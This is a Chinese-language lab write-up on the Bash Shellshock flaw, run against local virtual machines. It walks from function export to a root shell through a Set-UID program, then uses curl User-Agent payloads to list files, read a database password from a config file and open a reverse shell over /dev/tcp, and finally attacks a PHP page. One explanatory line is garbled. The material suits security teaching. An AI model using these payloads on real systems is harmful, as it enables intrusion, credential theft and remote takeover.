shell函数
在操作系统中,shell程序是一个命令解释器,他从终端窗口或控制台读取并执行命令,shell提供了用户和操作系统之间的接口。
目前存在着许多种不同类型的shell,包括sh(Bourne shell)、bash(Bource-again shell)、csh(C shell)、zsh(Z shell)和Windows PowerShell等。
Bash是Linux操作系统中最受欢迎的shell程序之一,Bash中的Shellshock漏洞与内部定义的函数有关,这些函数被称为shell函数。
root@VM:~
root@VM:~
foo ( )
{
echo "inside function"
}
root@VM:~
inside function
root@VM:~
root@VM:~
上面第一个命令定义了一个shell函数。
一个已经定义的shell函数可以使用declare命令打印出来。
为了使用shell函数,只需要在命令行中输入函数名称。
一旦不需要某个shell函数,可以使用unset命令来删除它。
将shell函数传递给子进程
Shellshock漏洞涉及进程如何把函数传递给它的子shell进程。
直接在父shell进程中定义一个函数,并将它输出给子进程,子shell进程就可以拥有这个函数了。
[ 07/05/20] seed@VM:~$ foo( ) { echo "hello world" ; }
[ 07/05/20] seed@VM:~$ export -f foo
[ 07/05/20] seed@VM:~$ bash
[ 07/05/20] seed@VM:~$ foo
hello world
第二方式是定义一个包含特殊内容的shell变量,foo变量以一对圆括号开头,后面跟着一句由两个大括号包含的命令,对于前面这些内容来说,这些圆括号、大括号没有任何意义,它们仅仅是一个变量的内容。
但是如果输出这个变量,然后再运行一个子Bash,就会发现在子shell中foo不再是一个简单的shell变量,而是变成了一个shell函数。
[ 07/05/20] seed@VM:~/code$ foo= '() { echo "hello world"; };'
[ 07/05/20] seed@VM:~/code$ echo $foo
( ) { echo "hello world" ; } ;
[ 07/05/20] seed@VM:~/code$ declare -f foo
foo ( )
{
echo "hello world"
}
[ 07/05/20] seed@VM:~/code$ unset -f foo
[ 07/05/20] seed@VM:~/code$ declare -f foo
[ 07/05/20] seed@VM:~/code$ export foo
[ 07/05/20] seed@VM:~/code$ bash_shellshock
[ 07/05/20] seed@VM:~/code$ echo $foo
[ 07/05/20] seed@VM:~/code$ declare -f foo
foo ( )
{
echo "hello world"
}
当一个shell变量被export命令标记时,它将作为环境变量传递给子进程。如果子进程中执行的程序又是一个Bash程序,则子进程的shell程序将环境变量转换成它自己的shell变量。在这个转换过程中,当Bash发现一个以一对圆括号开始的环境变量时,它就将该环境变量转换成一个shell函数,而非一个shell变量。
Shellshock漏洞
[ 07/05/20] seed@VM:~/code$ foo= '() { echo "hello world";}; echo "extra";'
[ 07/05/20] seed@VM:~/code$ echo $foo
( ) { echo "hello world" ; } ; echo "extra" ;
[ 07/05/20] seed@VM:~/code$ export foo
[ 07/05/20] seed@VM:~/code$ bash_shellshock
extra
[ 07/05/20] seed@VM:~/code$ echo $foo
[ 07/05/20] seed@VM:~/code$ declare -f foo
foo ( )
{
echo "hello world"
}
父进程可以通过环境变量向子进程shell传递函数定义,当子进程的Bash将环境变量转换成函数时,Bash应当将变量中的指令解析出来,而不是执行它们。
定义一个shell变量foo,用一个看上去函数定义的字符串作为变量foo的值,并且在结尾的大括号后面添加一个额外的命令echo,用export命令标记该shell变量,这样它会作为环境变量传递给子进程,当一个子进程的Bash被创建时,子shell将会解析该环境变量,把它转换为子函数定义,在解析过程中,由于Shellshock漏洞,Bash将执行大括号后面的额外命令。
Bash源代码中的错误
if (privmode== 0 && read_but_dont_execute == 0 && STREQN ( "() {" , string, 4 ) {
. . .
parse_and_excute ( temp_string, name, SEVAL_NONINT| SEVAL_NOHIST) ;
}
Bash检查环境变量是否以"(){"开头,以确定是否需要把它转换为函数,一旦发现这样的字符串,Bash将“=”替换成空格从而将环境变量变成一个函数定义,生产下面的字符串:
foo ( ) { echo "hello world" ; } ; echo "extre" ;
然后Bash调用parse_and_execute()函数来解析函数定义,然而parse_and_execute()函数的功能太过强大,它不仅仅解析函数定义,还可以解析和运行其他的shell指令。如果字符串只是一个函数定义,该函数只会解析它而不会执行它,但如果该字符串包含用分号(;)隔开的多个shell命令,则parse_and_execute()函数会解析和运行每一条命令。
Shellshock漏洞的利用
必须满足两个条件:
1. 目标进程必须运行Bash
2. 攻击者只能通过环境变量把攻击数据传给目标进程,如果不是这样的话,Shellshock漏洞则不会被激发。
利用ShellShock攻击Set-UID程序
当一个root用户的Set-UID程序通过system()函数执行/bin/ls程序时,将会启动一个Bash进程,攻击者设计的环境变量将导致非授权的命令以root权限被执行。
准备有漏洞的程序
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
void main ( )
{
setuid ( geteuid ( ) ) ;
system ( "/bin/ls -l" ) ;
}
system()函数来执行来执行/bin/ls命令,system()函数实际上会使用fork()函数来创建子进程,然后使用execl()函数执行/bin/sh程序,最终请求shell程序执行/bin/ls。
在Ubuntu16.04中,/bin/sh指向的是/bin/dash,因此system()函数只会调用/bin/dash,而这个程序是没有Shellshock漏洞的,因此需要修改链接,让/bin/sh指向有漏洞的bash_shellshock程序。
sudo ln -sf /bin/bash_shellshock /bin/sh
setuid(seteuid())函数把真是用户ID变为和有效用户ID一致,因为如果真实用户ID和有效用户ID不一致的话,Bash不会处理从环境变量处获得函数定义,因此不会受到Shellshock攻击。
编译并设置程序为root用户的Set-UID程序。
[ 07/05/20] seed@VM:~/codegcc -o vul vul.c
[ 07/05/20] seed@VM:~/codesudo chown root vul
[ 07/05/20] seed@VM:~/codesudo chmod 4755 vul
[ 07/05/20] seed@VM:~/code$ ./vul
total 12
-rwsr-xr-x 1 root seed 7420 Jul 5 07:40 vul
-rw-rw-r-- 1 seed seed 119 Jul 5 07:40 vul.c
基于Shellshock漏洞,可以构造一个函数声明,并将所选命令(/bin/sh)放在声明的最后,然后输出(export),再运行程序。
在这里需要注意shell函数声明内部的空格缩进,否则易发生错误。
[ 07/05/20] seed@VM:~/code$ export foo= '() { echo hello; }; /bin/sh'
[ 07/05/20] seed@VM:~/code$ ./vul
sh-4.2
当运行Set-UID程序时(vul)时,shell变量会变成子进程的环境变量,由于system()函数的原因,Bash会被调用,它检测到环境变量foo中存放一个函数声明,因此会解析该声明。
由于解析逻辑中的漏洞,它最终会执行放在末尾的/bin/sh,可以看到在运行后,出现了一个#号提示符就说明我们已经获取到了root权限的shell。
利用Shellshock攻击CGI程序
通用网关接口(CGI)被Web服务器用来生成动态网页的可执行程序,许多CGI程序时shell脚本,如果程序使用了Bash,那么它可能成为Shellshock的攻击目标。
该实验需要准备两台虚拟机:一个时攻击者,一个是目标服务器。
首先用Bash脚本编写一个简单的CGI程序,它的作用仅仅是打印出“Hello World”。
在CGI程序中使用有漏洞的bash_shellshock
#!/bin/bash _shellshock
echo "Content-type: text/plain"
echo
echo
echo "Hello World"
然后需要将该CGI程序放到目标服务器的/usr/lib/cgi-bin目录中,并将它的权限设置为775,该目录是Apache服务器的默认CGI目录。
seed@VM:/usr/lib/cgi-bin
Web服务器如何调用CGI程序
当用户向Apache服务器发送CGI请求时,Apache服务器会检查该请求,如果是一个CGI请求,Apache服务器会用fork()函数来新建一个进程,然后使用exec()函数族中的某个函数在新进程中执行CGI程序。
因为CGI程序以"#!/bin/bash_shellshock"开头,因此该程序是一个shell脚本,exec()函数实际上执行的是/bin/bash_shellshock,Bash会运行shell脚本。
出发Bash只是ShellShock攻击成功的条件之一,另一个重要的条件是攻击者必须通过环境变量为Bash程序提供输入。
#!/bin/bash _shellshock
echo "Content-type: text/plain"
echo
echo
echo "Environment Variables"
strings /proc/$$/environ
最后一行指令"strings /proc// e n v i r o n " 能 打 印 出 一 个 进 程 的 所 有 环 境 变 量 , B a s h 会 将 /environ"能打印出一个进程的所有环境变量,Bash会将 / e n v i r o n " 能 打 印 出 一 个 进 程 的 所 有 环 境 变 量 , B a s h 会 将 替换成当前进程的ID。
然后,通过curl来访问该CGI程序,使用-v选项,curl会打印出HTTP请求和来自服务器的响应。
C:\Users\12586> curl -v http://192.168.137.128/cgi-bin/test.cgi
* Trying 192.168.137.128.. .
* Connected to 192.168.137.128 ( 192.168.137.128) port 80 (
> GET /cgi-bin/test.cgi HTTP/1.1
> Host: 192.168.137.128
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 05 Jul 2020 13:44:00 GMT
< Server: Apache/2.4.18 ( Ubuntu)
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/plain
<
Environment Variables
HTTP_HOST= 192.168.137.128
HTTP_USER_AGENT= curl/7.47.0
HTTP_ACCEPT= */*
PATH= /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
.. ..
CGI程序打印出CGI进程的所有环境变量,其中一个环境变量HTTP_USER_AGENT,它的值和请求中的Uset-Agent完全一样,因此可以知道,Apache服务器从HTTP请求头中获得User-Agent信息,并将它赋值给一个名为HTTP_USER_AGENT的环境变量。
当Apache服务器创建一个子进程来执行CGI程序时,它会传递该变量以及其他一些环境变量给CGI程序。
使用命令行工具curl,该命令"-A"选项可以用来设置请求的User-Agent字段。
C:\Users\12586> curl -A "test" -v http://192.168.137.128/cgi-bin/test.cgi
* Trying 192.168.137.128.. .
* TCP_NODELAY set
* Connected to 192.168.137.128 ( 192.168.137.128) port 80 (
> GET /cgi-bin/test.cgi HTTP/1.1
> Host: 192.168.137.128
> User-Agent: test
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 05 Jul 2020 13:53:53 GMT
< Server: Apache/2.4.18 ( Ubuntu)
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/plain
<
Environment Variables
HTTP_HOST= 192.168.137.128
HTTP_USER_AGENT= test
.. .
可以看HTTP请求的User-Agent字段被设置为"test",HTTP_USER_AGENT环境变量也获得了一样的内容。
实施Shellshock攻击
获取服务器目录信息
攻击者需要做的是为了User-Agent字段构造一个字符串,以触发Bash中的错误解析逻辑,目标是让CGI程序执行选择的命令。
首先尝试一个/bin/ls指令,看能否获取服务器某个目录中的内容,在这个命令之前,还需要指定Apache返回数据的类型,因为Apache会受到CGI程序打印出的任何内容,因此可以通过Content-type: text/plain来告诉Apache服务器数据的类型。
C:\Users\12586> curl -A "() { echo hello; }; echo Content-type: text/plain; echo; /bin/ls -l" http://192.168.137.128/cgi-bin/test.cgi
total 4
-rwxrwxr-x 1 seed seed 121 Jul 5 09:43 test.cgi
从运行结果来看,/bin/ls命令得到了执行。
在Ubuntu中,Web服务器以www-data用户ID运行,这使得程序的权限非常有限,利用该权限不能控制服务器,但却能造成一些破坏。
盗取密码
当一个Web应用连接后台数据库(MySQL时),它需要提供登录密码,这些密码通常是直接写在程序中的,或者存储在配置文件中,远程用户无法读取这些密码,但是如果让服务器运行指令,就可以获得这些密码。
Ubuntu虚拟机中的Web服务器运行了几个Web应用,它们中的大多数都是使用数据库的,可以从下面这个文件获得密码:/var/www/CSRF/Elgg/elgg-config/settings.php,一旦获得了密码,就可以直接登录到数据库,盗取或者改动信息。
C:\Users\12586> curl -A "() { echo hello; }; echo Content-type: text/plain; echo; /bin/cat /var/www/CSRF/Elgg/elgg-config/settings.php" http://192.168.137.128/cgi-bin/test.cgi
< ?php
date_default_timezone_set( 'UTC' ) ;
global $CONFIG ;
if ( ! isset( $CONFIG )) {
$CONFIG = new \stdClass;
}
$CONFIG -> dbuser = 'elgg_admin' ;
/**
* The database password
*
* @global string $CONFIG -> dbpass
*/
$CONFIG -> dbpass = 'seedubuntu' ;
创建反向shell
通过shellshock漏洞在服务器中运行的最理想的命令时shell程序,因为shell程序允许用户输入任何命令,如果将/bin/bash放在Shellshock攻击中,Bash的确会在服务器端被执行,但是却无法控制它,不能给他提供命令,也无法看到它的输出。
反向Shell是让程序把它的输入和输出都交由远程计算机的用户控制,一般在受害者的机器中运行该Shell,从攻击者的机器中接受输入,同时也将输出发送到攻击者的机器中,反向shell为攻击者提供了一种在已被攻破的机器中运行命令的便捷方法。
攻击者可以使用netcat命令来运行一个TCP服务器,该服务器能够答应出客户端发来的所有信息,并向客户端发送用户在本地服务器中输入的信息。
nc -lv 9090
上述nc命令会阻塞等待并连接,现在服务器上直接运行下面的Bash程序:
/bin/bash -i > /dev/tcp/192.168.137.129/9090 0< & 1 2> & 1
该命令实在被攻破的服务器上执行的命令:
/bin/bash -i意味着使用shell的可交互模式,shell在这个模式下会提供提示符。
/dev/tcp/192.168.137.129/9090,使得shell的输出设备被重定向至TCP连接,连接到192.168.137.129的9090端口,在UNIX系统中,stdout的文件描述符是1.
0<&1:文件描述符0代表标准输入设备,这个选项告诉系统将标准输出设备也用作标准输入设备。由于标准输出已经重定向到TCP连接,因此Shell程序会从同一个TCP连接获得输入。TCP连接是一个双向设备,既可以往里面写数据,也可以从中读取数据。
2>&1:文件描述符2代表标准错误,这是错误也被重定向到TCP连接。
总结:/bin/bash -i > /dev/tcp/192.168.137.129/9090 0<&1 2>&1在服务器上开启一个Bash shell,他的输入来自TCP连接,输出又被传给同一个TCP连接。
回到攻击者的计算机可以看到反向shell创建成功:
Attacker@VM:/$ nc -lv 9090
Listening on [ 0.0.0.0] ( family 0, port 9090)
Connection from [ 192.168.137.128] port 9090 [ tcp/*] accepted ( family 2, sport 47964)
[ 07/05/20] seed@VM:~$
在Shellshock攻击中创建反向Shell
攻击者先运行
Attacker@VM:/$ nc -lv 9090
然后再启动一个控制台运行下面给命令向目标服务器的CGI发起恶意请求:
Attacker@VM:/$ curl -A "() { echo hello; }; echo Content-type: text/plain; echo; echo; /bin/bash -i > /dev/tcp/192.168.137.129/9090 0<&1 2>&1" http://192.168.137.128/cgi-bin/test.cgi
3.从结果来看,一旦curl指令被执行,攻击指令也会再服务器上被运行,这将导致CGI程序触发一个Bash shell,该Bash shell会链接到192.168.137.129的9090端口,也就是攻击者的计算机,攻击者的nc程序会接受这个连接,并显示由远端服务器的CGI触发的Bash程序送来的Shell提示符,这表反向Shell成功了。Attacker@VM:/$ nc -lv 9090
Listening on [ 0.0.0.0] ( family 0, port 9090)
Connection from [ 192.168.137.128] port 9090 [ tcp/*] accepted ( family 2, sport 47966)
bash: cannot set terminal process group ( 2389) : Inappropriate ioctl for device
bash: no job control in this shell
www-data@VM:/usr/lib/cgi-bin$ id
id
uid= 33( www-data) gid= 33( www-data) groups= 33( www-data)
结果表明,可以服务器上以www-data身份运行任何命令了,虽然不是一个特殊用户。
针对PHP的远程攻击
对于shellshock的漏洞,php满足两个条件:
Php有system()函数可以用来执行外部命令。
用户数据需要被作为环境变量传入给PHP程序,因此程序调用system()函数时,环境变量被进一步传递给运行的Bash程序。
再Apach服务器中,PHP可以通过三种方式运行:Apache组件、CGI和Fast CGI。以CGI运行PHP会与之前例子有相同的效果,但是以Fast CGI和Apache组件运行,从Apache服务器获得的数据无法通过环境变量交给PHP程序。
如果再调用system()之前,PHP程序根据用户的输入设置了环境变量,那么它还是存在Shellshock漏洞的。
<?php
function getParam ( )
{
$arg = NULL ;
if ( isset ( $_GET [ "arg" ] ) && ! empty ( $_GET [ "arg" ] ) )
{
$arg = $_GET [ "arg" ] ;
}
return $arg ;
}
$arg = getParam ( ) ;
putenv ( "ARG=$arg " ) ;
system ( "strings /proc/$$/environ | grep ARG" ) ;
?>
将该文件放到/var/www/html目录下,修改文件权限为775.
通过攻击者的计算机执行如下指令:
Attacker@VM:/$ curl http://192.168.137.128/test.php?arg= "()%20%7B%20echo%20hello;%20%7D;%20/bin/cat%20/var/www/secret.txt"
THIS IS SECRET
对于arg参数来说,除了包含一个shell函数定义外,还加上额外的命令,该命令是"arg=() { echo hello;}; /bin/cat /var/www/secret.txt"的URL编码,该命令的目的是读取secret.txt文件的内容,当system()函数开启shell程序解析环境变量时,在shell函数定义末尾的额外指令将被执行。